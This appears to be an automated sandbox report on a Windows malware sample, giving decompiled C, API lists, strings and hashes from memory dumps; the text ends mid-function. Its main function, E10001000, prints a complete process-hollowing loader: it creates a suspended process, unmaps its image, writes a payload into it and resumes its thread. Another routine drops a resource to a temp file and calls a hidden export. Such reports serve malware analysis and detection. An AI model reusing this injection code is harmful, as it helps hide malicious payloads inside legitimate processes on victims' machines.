0x004014bf
0x004014c3
0x004014c6
0x004014ce
0x004014d4
0x004014d6
0x004014e9
0x004014ef
0x00401507
0x0040150c
0x00401515
0x0040151e
0x00401524
0x00401526
0x0040152f
0x0040152f
0x0040153c
0x00401542
0x00401552
0x0040155b
0x00401566
0x00401577
0x00401581
0x00401590
0x00401599
0x004015a1
0x004015a8
0x004015ac
0x00401394
0x00401394
0x004013a2
0x004013a4
0x004013a8
0x004013aa
0x004013aa
0x004013ad
0x004013ae
0x004013b1
0x004013b1
0x00000000
0x00401394
0x00401281
0x00401281
0x00401288
0x0040128a
0x0040128d
0x00401290
0x00401293
0x00000000
0x00401281

APIs

GetSysColor.USER32(000003E8), ref: 004010B6
GetDoubleClickTime.USER32(?,00000000), ref: 004010BF
SetDoubleClickTime.USER32(00000000,?,00000000), ref: 004010CB
GetTickCount.KERNEL32 ref: 004010D1
GetDesktopWindow.USER32 ref: 004010E6
PeekMessageA.USER32 ref: 00401100
Sleep.KERNEL32(00000064,?,00000000), ref: 00401117
IsWindow.USER32(?), ref: 00401122
IsDialogMessageA.USER32(?,?,?,00000000), ref: 00401136
TranslateMessage.USER32(?), ref: 00401147
DispatchMessageA.USER32 ref: 00401154
IsDlgButtonChecked.USER32(?,00000007), ref: 0040115F
GetDesktopWindow.USER32 ref: 00401165
FindWindowA.USER32 ref: 00401181
SetWindowTextA.USER32(00000000,?), ref: 00401192
LoadLibraryA.KERNEL32(Kernel32.dll,?,00000000), ref: 004011A7
GetProcAddress.KERNEL32(00000000,GetTempPathA), ref: 004011AF
FindResourceA.KERNEL32(00000000,0000016E,0000011C), ref: 004011DD
IsClipboardFormatAvailable.USER32(00000002), ref: 004011E8
wsprintfA.USER32 ref: 004011FE
LoadResource.KERNEL32(00000000,?), ref: 0040120B
SizeofResource.KERNEL32(00000000,?,?,?,?), ref: 0040129A
GetLastError.KERNEL32 ref: 004012A3
GetCurrentProcess.KERNEL32(?), ref: 004012B3
TerminateProcess.KERNEL32(00000000), ref: 004012BA
LockResource.KERNEL32(00401CCF), ref: 004012C3
GetOpenFileNameA.COMDLG32(00000058), ref: 00401340
SetFileAttributesA.KERNEL32(?,00000080), ref: 00401358
lstrcmpiA.KERNEL32(?,GetTempPathA), ref: 0040136D
MessageBoxA.USER32 ref: 00401387
GetClassInfoW.USER32 ref: 004013C3
GetSysColor.USER32(?), ref: 004013CF
GetTempPathA.KERNEL32(00000104,?), ref: 004013DD
GetUserDefaultLangID.KERNEL32 ref: 004013E3
PathAddBackslashA.KERNELBASE(?), ref: 004013F0
lstrcatA.KERNEL32(?, athefff3h6266cd5fa708f.tmp), ref: 00401402
CreateFileA.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 0040141C
WriteFile.KERNELBASE(?,?,00000C00,?,00000000), ref: 004014E9
GetLastError.KERNEL32 ref: 004014EF
FormatMessageA.KERNELBASE(00001000,00000000,00000000,00000000,?,00000064,00000000), ref: 0040150C
CloseHandle.KERNEL32(?), ref: 00401515
IsWindowEnabled.USER32(00401CCF), ref: 0040151E
PostMessageA.USER32 ref: 0040152F
LoadLibraryA.KERNELBASE(?), ref: 0040153C
lstrlenA.KERNEL32(peagtfosapeh), ref: 0040154A
GetProcAddress.KERNEL32(00000000,peagtfosapeh), ref: 00401555
GetCurrentThreadId.KERNEL32 ref: 00401560
peagtfosapeh. ATHEFFF3H6266CD5FA708F(?,28E32B02), ref: 00401577

Strings

athefff3h6266cd5fa708f.tmp, xrefs: 004013FC
BUTTON, xrefs: 004013BD
peagtfosapeh, xrefs: 00401542, 00401549, 00401550
!, xrefs: 004013A4
Kernel32.dll, xrefs: 004011A2
GetTempPathA, xrefs: 00401198, 004011AD, 00401364
X, xrefs: 004012F1
All, xrefs: 00401301
4rwsl5feha6g446p, xrefs: 0040117B
ecr6f1hda7ehw23grp51, xrefs: 00401381

Memory Dump Source

Source File: 00000001.00000002.202773775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.202767480.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.202789296.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.202798042.000000000040E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.202804109.0000000000413000.00000004.00020000.sdmp Download File

Similarity

API ID: Message$Window$FileResource$Load$AddressClickColorCurrentDesktopDoubleErrorFindFormatLastLibraryPathProcProcessTime$AttributesAvailableBackslashButtonCheckedClassClipboardCloseCountCreateDefaultDialogDispatchEnabledHandleInfoLangLockNameOpenPeekPostSizeofSleepTempTerminateTextThreadTickTranslateUserWritelstrcatlstrcmpilstrlenpeagtfosapehwsprintf
String ID: athefff3h6266cd5fa708f.tmp$!$4rwsl5feha6g446p$All$BUTTON$GetTempPathA$Kernel32.dll$X$ecr6f1hda7ehw23grp51$peagtfosapeh
API String ID: 1282199338-2565982991
Opcode ID: d4d037168cdf705e2c413aa345491b2412fc18583c4a8845e99b8b9a8c625e62
Instruction ID: 40662582736761f9d9428d92394502f34322fec3036796530f137261310b5829
Opcode Fuzzy Hash: d4d037168cdf705e2c413aa345491b2412fc18583c4a8845e99b8b9a8c625e62
Instruction Fuzzy Hash: F6F11BB1D00219EFDB10DFA5DD88ADEBBB8FB08305F1045BAE505B62A1DB745A84CF58

Uniqueness

Uniqueness Score: -1.00%

Function 10001000, Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 175
processlibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 42%

			E10001000(SIZE_T* _a4, SIZE_T* _a8) {
				CHAR* _v8;
				intOrPtr _v12;
				struct HINSTANCE__* _v16;
				struct _PROCESS_INFORMATION _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v56;
				struct _STARTUPINFOA _v124;
				void _v379;
				char _v380;
				struct _CONTEXT _v1096;
				_Unknown_base(*)()* _t107;
				CHAR* _t123;
				void* _t136;
				void* _t158;
				void* _t161;
				signed int _t163;
				signed int _t166;
				void* _t170;
				struct HINSTANCE__* _t173;
				void* _t178;
				CHAR* _t179;
				void* _t181;

				if(_a8 == 0x28e32b02) {
					_t179 = _a4;
					_a4 =  &(_a4[0x7d]);
					_t163 = 0x11;
					memset( &_v124, 0, _t163 << 2);
					_t173 = GetModuleHandleA( &(_t179[0x129]));
					_v16 = _t173;
					_t107 = GetProcAddress(_t173, 0x10003000);
					_a8 = _t107;
					_v36 =  *_t107(_t173,  &(_t179[0x6c]), _t170, _t178, _t158);
					_v40 = _a8(_t173,  &(_t179[0x87]));
					_v12 = _a8(_t173,  &(_t179[0xd8]));
					_v8 = _a8(_t173,  &(_t179[0x10e]));
					_v52 = _a8(_t173,  &(_t179[0x51]));
					_v48 = _a8(_t173,  &(_t179[0x144]));
					_v44 = _a8(GetModuleHandleA(_t179),  &(_t179[0x1b]));
					_v1096.ContextFlags = 0x10007;
					_t161 = _a4 + _a4[0xf];
					_t123 = _v8();
					_v380 = _v380 & 0x00000000;
					_v8 = _t123;
					_t166 = 0x3f;
					memset( &_v379, 0, _t166 << 2);
					asm("stosw");
					_v48(0,  &_v380, 0xff);
					_v124.cb = 0x44;
					CreateProcessA( &_v380, _v8, 0, 0, 0, 0x24, 0, 0,  &_v124,  &_v32);
					_v8 = _a8(_v16,  &(_t179[0x36]));
					_v12 = _a8(_v16,  &(_t179[0xbd]));
					NtUnmapViewOfSection(_v32.hProcess,  *(_t161 + 0x34));
					_t136 = VirtualAllocEx(_v32.hProcess,  *(_t161 + 0x34),  *(_t161 + 0x50), 0x3000, 0x40);
					_t181 = _a4;
					_v56 = _t136;
					WriteProcessMemory(_v32.hProcess,  *(_t161 + 0x34), _t181,  *(_t161 + 0x54), 0);
					_a8 = 0;
					if( *(_t161 + 6) <= 0) {
						L5:
						GetThreadContext(_v32.hThread,  &_v1096);
						WriteProcessMemory(_v32.hProcess, _v1096.Ebx + 8,  &_v56, 4, 0);
						_v1096.Eax =  *((intOrPtr*)(_t161 + 0x28)) +  *(_t161 + 0x34);
						SetThreadContext(_v32.hThread,  &_v1096);
						ResumeThread(_v32.hThread);
						return 0;
					}
					_a4 = 0;
					do {
						WriteProcessMemory(_v32,  *((intOrPtr*)(_a4 +  *((intOrPtr*)(_t181 + 0x3c)) + _t181 + 0xf8 + 0xc)) +  *(_t161 + 0x34),  *((intOrPtr*)(_a4 +  *((intOrPtr*)(_t181 + 0x3c)) + _t181 + 0x10c)) + _t181,  *(_a4 +  *((intOrPtr*)(_t181 + 0x3c)) + _t181 + 0x108), 0);
						_a8 = _a8 + 1;
						_a4 = _a4 + 0x28;
					} while (_a8 < ( *(_t161 + 6) & 0x0000ffff));
					goto L5;
				}
				return 0;
			}

0x10001010
0x1000101b
0x10001027
0x1000102e
0x10001034
0x1000103f
0x10001047
0x1000104a
0x10001053
0x1000105a
0x10001068
0x10001076
0x10001084
0x1000108f
0x1000109d
0x100010ab
0x100010b1
0x100010be
0x100010c0
0x100010c3
0x100010cc
0x100010cf
0x100010d8
0x100010da
0x100010eb
0x100010f1
0x1000110e
0x10001121
0x1000112e
0x10001134
0x10001147
0x1000114a
0x1000114e
0x1000115b
0x10001162
0x10001165
0x100011a6
0x100011b0
0x100011c7
0x100011d0
0x100011e0
0x100011e6
0x00000000
0x100011ed
0x10001167
0x1000116a
0x10001193
0x1000119a
0x1000119d
0x100011a1
0x00000000
0x1000116a
0x00000000

APIs

GetModuleHandleA.KERNEL32(?), ref: 1000103D
GetProcAddress.KERNEL32(00000000,10003000), ref: 1000104A
GetModuleHandleA.KERNEL32(?,?), ref: 100010A5
CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000024,00000000,00000000,00000044,?), ref: 1000110E

Strings

D, xrefs: 100010F1
(, xrefs: 1000119D

Memory Dump Source

Source File: 00000001.00000002.203587581.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.203583958.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.203591799.0000000010002000.00000002.00020000.sdmp Download File

Similarity

API ID: HandleModule$AddressCreateProcProcess
String ID: ($D
API String ID: 4021000284-1229367909
Opcode ID: 39744b46a75ac6576c839fc4313280895390cc88ab62c019b72d10fdbd97ecd7
Instruction ID: 18af93879d43d3d8615236c09123fb992b543f7fac10d2d509d01180485a2bf9
Opcode Fuzzy Hash: 39744b46a75ac6576c839fc4313280895390cc88ab62c019b72d10fdbd97ecd7
Instruction Fuzzy Hash: 7F61C772800209BFDF11DFA4CC88EEEBBB9EF48314F10806AFA19A6151D7749A55DF64

Uniqueness

Uniqueness Score: -1.00%

Function 00403D2A, Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 196
timeCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E00403D2A() {
				char _v4;
				void* __ecx;
				long _t13;
				long _t14;
				char* _t20;
				intOrPtr _t22;
				intOrPtr _t23;
				char* _t24;
				char* _t26;
				signed int _t27;
				intOrPtr _t29;
				void* _t30;
				intOrPtr _t31;
				signed int _t32;
				signed int _t33;
				char* _t36;
				char* _t39;
				char* _t40;
				intOrPtr _t41;
				signed int _t45;
				int _t46;
				void* _t48;
				signed int _t51;
				signed int _t54;
				signed int _t56;
				signed int _t58;
				intOrPtr _t59;
				long _t62;
				intOrPtr* _t63;
				intOrPtr _t74;
				intOrPtr _t76;

				_t46 = _t45 | 0xffffffff;
				 *0x40f128 = 0;
				 *0x40e3e8 = _t46;
				 *0x40e3d8 = _t46;
				_t13 = E00404ED4("TZ");
				_t62 = _t13;
				_pop(_t48);
				if(_t62 != 0) {
					if( *_t62 != 0) {
						_t14 =  *0x40f1dc; // 0x0
						if(_t14 == 0) {
							L18:
							E004022F7( *0x40f1dc);
							_t13 = E00401F8B(E00404880(_t62) + 1);
							 *0x40f1dc = _t13;
							if(_t13 != 0) {
								E00404790(_t13, _t62);
								E00404990( *0x40e3cc, _t62, 3);
								_t20 =  *0x40e3cc; // 0x40e34c
								_t63 = _t62 + 3;
								_t20[3] = _t20[3] & 0x00000000;
								if( *_t63 == 0x2d) {
									_push(1);
									_t63 = _t63 + 1;
									_pop(0);
								}
								_t51 = E00404DC5(_t48, _t63) * 0xe10;
								 *0x40e340 = _t51;
								while(1) {
									_t22 =  *_t63;
									if(_t22 != 0x2b && (_t22 < 0x30 || _t22 > 0x39)) {
										break;
									}
									_t63 = _t63 + 1;
								}
								if( *_t63 != 0x3a) {
									L36:
									if(0 != 0) {
										 *0x40e340 =  ~_t51;
									}
									_t23 =  *_t63;
									 *0x40e344 = _t23;
									if(_t23 == 0) {
										goto L40;
									} else {
										E00404990( *0x40e3d0, _t63, 3);
										_t26 =  *0x40e3d0; // 0x40e38c
										_t26[3] = _t26[3] & 0x00000000;
										return _t26;
									}
								}
								_t63 = _t63 + 1;
								_t27 = E00404DC5(_t51, _t63);
								_t54 =  *0x40e340; // 0x7080
								_t51 = _t54 + _t27 * 0x3c;
								 *0x40e340 = _t51;
								while(1) {
									_t29 =  *_t63;
									if(_t29 < 0x30 || _t29 > 0x39) {
										break;
									}
									_t63 = _t63 + 1;
								}
								if( *_t63 != 0x3a) {
									goto L36;
								}
								_t63 = _t63 + 1;
								_t30 = E00404DC5(_t51, _t63);
								_t56 =  *0x40e340; // 0x7080
								_t51 = _t56 + _t30;
								 *0x40e340 = _t51;
								while(1) {
									_t31 =  *_t63;
									if(_t31 < 0x30 || _t31 > 0x39) {
										goto L36;
									}
									_t63 = _t63 + 1;
								}
								goto L36;
							}
						} else {
							_t13 = E00404E50(_t62, _t14);
							_pop(_t48);
							if(_t13 != 0) {
								goto L18;
							}
						}
					}
				} else {
					_t13 = GetTimeZoneInformation(0x40f130); // executed
					if(_t13 != _t46) {
						_t32 = 0x40f130->Bias; // 0x1e0
						_t58 =  *0x40f184; // 0x0
						_t33 = _t32 * 0x3c;
						_t74 =  *0x40f176; // 0xb
						_t59 = 1;
						 *0x40e340 = _t33;
						 *0x40f128 = _t59;
						if(_t74 != 0) {
							 *0x40e340 = _t33 + _t58 * 0x3c;
						}
						_t76 =  *0x40f1ca; // 0x3
						if(_t76 == 0) {
							L7:
							 *0x40e344 = 0;
							 *0x40e348 = 0;
							goto L8;
						} else {
							_t41 =  *0x40f1d8; // 0xffffffc4
							if(_t41 == 0) {
								goto L7;
							}
							 *0x40e344 = _t59;
							 *0x40e348 = (_t41 - _t58) * 0x3c;
							L8:
							_t1 =  &_v4; // 0x402279
							if(WideCharToMultiByte( *0x40f234, 0x220, ?str?, _t46,  *0x40e3cc, 0x3f, 0, _t1) == 0 || _v4 != 0) {
								_t36 =  *0x40e3cc; // 0x40e34c
								 *_t36 =  *_t36 & 0x00000000;
							} else {
								_t40 =  *0x40e3cc; // 0x40e34c
								_t40[0x3f] = _t40[0x3f] & 0x00000000;
							}
							_t5 =  &_v4; // 0x402279
							if(WideCharToMultiByte( *0x40f234, 0x220, ?str?, _t46,  *0x40e3d0, 0x3f, 0, _t5) == 0 || _v4 != 0) {
								L40:
								_t24 =  *0x40e3d0; // 0x40e38c
								 *_t24 =  *_t24 & 0x00000000;
								return _t24;
							} else {
								_t39 =  *0x40e3d0; // 0x40e38c
								_t39[0x3f] = _t39[0x3f] & 0x00000000;
								return _t39;
							}
						}
					}
				}
				return _t13;
			}

0x00403d31
0x00403d3b
0x00403d41
0x00403d47
0x00403d4d
0x00403d52
0x00403d54
0x00403d57
0x00403e56
0x00403e5c
0x00403e63
0x00403e76
0x00403e7c
0x00403e89
0x00403e93
0x00403e98
0x00403ea0
0x00403eae
0x00403eb3
0x00403eb8
0x00403ebe
0x00403ec5
0x00403ec7
0x00403ec9
0x00403eca
0x00403eca
0x00403ed6
0x00403edc
0x00403ee2
0x00403ee2
0x00403ee6
0x00000000
0x00000000
0x00403ef0
0x00403ef0
0x00403ef6
0x00403f46
0x00403f48
0x00403f4c
0x00403f4c
0x00403f52
0x00403f57
0x00403f5c
0x00000000
0x00403f5e
0x00403f67
0x00403f6c
0x00403f74
0x00000000
0x00403f74
0x00403f5c
0x00403ef8
0x00403efa
0x00403f03
0x00403f09
0x00403f0b
0x00403f11
0x00403f11
0x00403f15
0x00000000
0x00000000
0x00403f1b
0x00403f1b
0x00403f21
0x00000000
0x00000000
0x00403f23
0x00403f25
0x00403f2b
0x00403f31
0x00403f33
0x00403f39
0x00403f39
0x00403f3d
0x00000000
0x00000000
0x00403f43
0x00403f43
0x00000000
0x00403f39
0x00403e65
0x00403e67
0x00403e6f
0x00403e70
0x00000000
0x00000000
0x00403e70
0x00403e63
0x00403d5d
0x00403d62
0x00403d6a
0x00403d70
0x00403d75
0x00403d7b
0x00403d7e
0x00403d87
0x00403d88
0x00403d8d
0x00403d93
0x00403d9c
0x00403d9c
0x00403da1
0x00403da8
0x00403dc5
0x00403dc5
0x00403dcb
0x00000000
0x00403daa
0x00403daa
0x00403db1
0x00000000
0x00000000
0x00403db5
0x00403dbe
0x00403dd1
0x00403dd1
0x00403dfb
0x00403e0e
0x00403e13
0x00403e03
0x00403e03
0x00403e08
0x00403e08
0x00403e16
0x00403e35
0x00403f7a
0x00403f7a
0x00403f7f
0x00000000
0x00403e45
0x00403e45
0x00403e4a
0x00000000
0x00403e4a
0x00403e35
0x00403da8
0x00403d6a
0x00403f87

APIs

GetTimeZoneInformation.KERNELBASE(0040F130,?,00401586,?,?,?,00403D23,00402279,00000000,peagtfosapeh,00000000,?,00401BDA,?,?,?), ref: 00403D62
WideCharToMultiByte.KERNEL32(00000220,Pacific Standard Time,?,0000003F,00000000,y"@,?,?,?,00403D23,00402279,00000000,peagtfosapeh,00000000,?,00401BDA), ref: 00403DF7
WideCharToMultiByte.KERNEL32(00000220,Pacific Daylight Time,?,0000003F,00000000,y"@,?,?,?,00403D23,00402279,00000000,peagtfosapeh,00000000,?,00401BDA), ref: 00403E31

Strings

L@, xrefs: 00403E03, 00403E0E, 00403EB3
y"@, xrefs: 00403DD1, 00403E16, 00403DDB, 00403E1A
Pacific Standard Time, xrefs: 00403DEB
Pacific Daylight Time, xrefs: 00403E25

Memory Dump Source

Source File: 00000001.00000002.202773775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.202767480.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.202789296.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.202798042.000000000040E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.202804109.0000000000413000.00000004.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWide$InformationTimeZone
String ID: L@$Pacific Daylight Time$Pacific Standard Time$y"@
API String ID: 1904278450-2651511232
Opcode ID: 97961b1d252c7c0b78069c63fcb0b7dfd67abbeefdeb6346a8d88142f43e1b5d
Instruction ID: 5836fcb9fd4236726f856a08956557aaaeb77f5e42c1df6664730c776e31b8a5
Opcode Fuzzy Hash: 97961b1d252c7c0b78069c63fcb0b7dfd67abbeefdeb6346a8d88142f43e1b5d
Instruction Fuzzy Hash: 7B61F1B1A082429AD7349F66ED41B163FA9AB41301F18093FF884B72E0C7789E52CB5D

Uniqueness

Uniqueness Score: -1.00%

Function 00401B0C, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 75
timeCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00401B0C(intOrPtr* _a4) {
				struct _SYSTEMTIME _v20;
				struct _SYSTEMTIME _v36;
				short _v54;
				struct _TIME_ZONE_INFORMATION _v208;
				void* __edi;
				void* __esi;
				signed int _t23;
				signed int _t24;
				intOrPtr _t31;
				intOrPtr* _t36;
				void* _t37;
				void* _t39;
				void* _t43;
				void* _t44;
				void* _t45;
				void* _t46;
				void* _t47;

				GetLocalTime( &_v20);
				GetSystemTime( &_v36);
				_t43 = _v36.wMinute -  *0x40ef92; // 0x4
				if(_t43 != 0) {
					L6:
					_t23 = GetTimeZoneInformation( &_v208); // executed
					if(_t23 == 0xffffffff) {
						_t24 = _t23 | 0xffffffff;
					} else {
						if(_t23 != 2 || _v54 == 0 || _v208.DaylightBias == 0) {
							_t24 = 0;
						} else {
							_t24 = 1;
						}
					}
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t37 = _t37;
					 *0x40ef80 = _t24;
					_t39 = _t39;
					L14:
					_t31 = E00402235(_t37, _t39, _v20.wYear & 0x0000ffff, _v20.wMonth & 0x0000ffff, _v20.wDay & 0x0000ffff, _v20.wHour & 0x0000ffff, _v20.wMinute & 0x0000ffff, _v20.wSecond & 0x0000ffff, _t24);
					_t36 = _a4;
					if(_t36 == 0) {
						return _t31;
					}
					 *_t36 = _t31;
					return _t31;
				}
				_t44 = _v36.wHour -  *0x40ef90; // 0x4
				if(_t44 != 0) {
					goto L6;
				}
				_t45 = _v36.wDay -  *0x40ef8e; // 0x3
				if(_t45 != 0) {
					goto L6;
				}
				_t46 = _v36.wMonth -  *0x40ef8a; // 0x8
				if(_t46 != 0) {
					goto L6;
				}
				_t47 = _v36.wYear -  *0x40ef88; // 0x7e5
				if(_t47 != 0) {
					goto L6;
				}
				_t24 =  *0x40ef80; // 0x1
				goto L14;
			}

0x00401b19
0x00401b23
0x00401b2d
0x00401b34
0x00401b71
0x00401b78
0x00401b81
0x00401b9e
0x00401b83
0x00401b86
0x00401b9a
0x00401b95
0x00401b97
0x00401b97
0x00401b86
0x00401bab
0x00401bac
0x00401bad
0x00401bae
0x00401baf
0x00401bb0
0x00401bb5
0x00401bb6
0x00401bd5
0x00401bda
0x00401be2
0x00401be7
0x00401be7
0x00401be4
0x00000000
0x00401be4
0x00401b3a
0x00401b41
0x00000000
0x00000000
0x00401b47
0x00401b4e
0x00000000
0x00000000
0x00401b54
0x00401b5b
0x00000000
0x00000000
0x00401b61
0x00401b68
0x00000000
0x00000000
0x00401b6a
0x00000000

APIs

GetLocalTime.KERNEL32(?), ref: 00401B19
GetSystemTime.KERNEL32(?), ref: 00401B23
GetTimeZoneInformation.KERNELBASE(?), ref: 00401B78

Strings

peagtfosapeh, xrefs: 00401BA1

Memory Dump Source

Source File: 00000001.00000002.202773775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.202767480.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.202789296.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.202798042.000000000040E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.202804109.0000000000413000.00000004.00020000.sdmp Download File

Similarity

API ID: Time$InformationLocalSystemZone
String ID: peagtfosapeh
API String ID: 2475273158-1931456857
Opcode ID: e46d82e06c89ad7da047e3dd66e3653f9e827ec92eed376e6acac51d821b1b5b
Instruction ID: 52ebf5b42d5d009e41bdf42155f7a55d4a88f1fa23556fd2c6c295d3821e46f0
Opcode Fuzzy Hash: e46d82e06c89ad7da047e3dd66e3653f9e827ec92eed376e6acac51d821b1b5b
Instruction Fuzzy Hash: F5212C2990011AE9DB20AB99D945AFF76B9BB08714F800522FD15B62E0E37C9D96C738

Uniqueness

Uniqueness Score: -1.00%

Function 00401C01, Relevance: 6.1, APIs: 4, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 72%

			_entry_(void* __ebx, void* __edi, void* __esi) {
				CHAR* _v8;
				intOrPtr* _v24;
				intOrPtr _v28;
				struct _STARTUPINFOA _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				unsigned int _t15;
				signed int _t26;
				intOrPtr _t28;
				void* _t31;
				signed int _t34;
				intOrPtr _t50;

				_push(0xffffffff);
				_push(0x40c160);
				_push(E00402C1C);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t50;
				_push(__esi);
				_v28 = _t50 - 0x58;
				_t15 = GetVersion();
				 *0x40efbc = 0;
				_t34 = _t15 & 0x000000ff;
				 *0x40efb8 = _t34;
				 *0x40efb4 = _t34 << 8;
				 *0x40efb0 = _t15 >> 0x10;
				if(E00402AE5(0) == 0) {
					E00401D1C(0x1c);
				}
				_v8 = 0;
				E0040293A();
				 *0x410a58 = GetCommandLineA();
				 *0x40ef98 = E00402808();
				E004025BB();
				E00402502();
				E00401E60();
				_v96.dwFlags = 0;
				GetStartupInfoA( &_v96);
				_v104 = E004024AA();
				_t53 = _v96.dwFlags & 0x00000001;
				if((_v96.dwFlags & 0x00000001) == 0) {
					_t26 = 0xa;
				} else {
					_t26 = _v96.wShowWindow & 0x0000ffff;
				}
				_push(_t26);
				_push(_v104);
				_push(0);
				_push(GetModuleHandleA(0)); // executed
				_t28 = E0040105A(); // executed
				_v100 = _t28;
				E00401E8D(_t28);
				_t30 = _v24;
				_t39 =  *((intOrPtr*)( *_v24));
				_v108 =  *((intOrPtr*)( *_v24));
				_t31 = E00402326(0, _t53, _t39, _t30); // executed
				return _t31;
			}

0x00401c04
0x00401c06
0x00401c0b
0x00401c16
0x00401c17
0x00401c22
0x00401c24
0x00401c27
0x00401c31
0x00401c39
0x00401c3f
0x00401c4a
0x00401c53
0x00401c63
0x00401c67
0x00401c6c
0x00401c6d
0x00401c70
0x00401c7b
0x00401c85
0x00401c8a
0x00401c8f
0x00401c94
0x00401c99
0x00401ca0
0x00401cab
0x00401cae
0x00401cb2
0x00401cbc
0x00401cb4
0x00401cb4
0x00401cb4
0x00401cbd
0x00401cbe
0x00401cc1
0x00401cc9
0x00401cca
0x00401ccf
0x00401cd3
0x00401cd8
0x00401cdd
0x00401cdf
0x00401ce4
0x00401ceb

APIs

GetVersion.KERNEL32 ref: 00401C27

Part of subcall function 00402AE5: HeapCreate.KERNELBASE(00000000,00001000,00000000,00401C60,00000000), ref: 00402AF6
Part of subcall function 00402AE5: HeapDestroy.KERNEL32 ref: 00402B14

GetCommandLineA.KERNEL32 ref: 00401C75
GetStartupInfoA.KERNEL32(?), ref: 00401CA0
GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00401CC3

Part of subcall function 00401D1C: ExitProcess.KERNEL32 ref: 00401D39

Memory Dump Source

Source File: 00000001.00000002.202773775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.202767480.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.202789296.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.202798042.000000000040E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.202804109.0000000000413000.00000004.00020000.sdmp Download File

Similarity

API ID: Heap$CommandCreateDestroyExitHandleInfoLineModuleProcessStartupVersion
String ID:
API String ID: 2057626494-0
Opcode ID: f537686c66c02ca70e4a5b01c48241de77aecdc079a3055343b65443c747ab14
Instruction ID: 75f3ac77dbf1e2069170e3b69c6953e13768a6a03d0162f08dd168863ae30c51
Opcode Fuzzy Hash: f537686c66c02ca70e4a5b01c48241de77aecdc079a3055343b65443c747ab14
Instruction Fuzzy Hash: 5221A1B0944215EEDB04AFA2DE4AA6EBBB8EF04704F10413EF805B72E0DB7C4440CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0040A813, Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040A813() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E0040A7CD); // executed
				 *0x40f6a8 = _t1;
				return _t1;
			}

0x0040a818
0x0040a81e
0x0040a823

APIs

SetUnhandledExceptionFilter.KERNELBASE(Function_0000A7CD), ref: 0040A818

Memory Dump Source

Source File: 00000001.00000002.202773775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.202767480.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.202789296.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.202798042.000000000040E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.202804109.0000000000413000.00000004.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 763f2cd4770b2ad903e6415f1d4cd37e1c68d59bf78b5fb6da0b567fa8578524
Instruction ID: 84051c8a21b34ff1bcaae610dbce1785ed4774f14ffcd3f9921292504844d160
Opcode Fuzzy Hash: 763f2cd4770b2ad903e6415f1d4cd37e1c68d59bf78b5fb6da0b567fa8578524
Instruction Fuzzy Hash: 6CA002F4553700DFD7207FB4AE895067AB0A644B02720857BA802B36B6EB7D4065DE2E

Uniqueness

Uniqueness Score: -1.00%

Function 0040A825, Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNELBASE ref: 0040A82A

Memory Dump Source

Source File: 00000001.00000002.202773775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.202767480.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.202789296.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.202798042.000000000040E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.202804109.0000000000413000.00000004.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: f6e584ab4c4dea2fa8637cac1696d256f74dc57c4427400b879fa199b27a3853
Instruction ID: 4192e2497110465cce471e6136dd20b0f5512295cee06bc732af318dccda3813
Opcode Fuzzy Hash: f6e584ab4c4dea2fa8637cac1696d256f74dc57c4427400b879fa199b27a3853
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 00403538, Relevance: 6.1, APIs: 4, Instructions: 53
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403538() {
				signed int _t15;
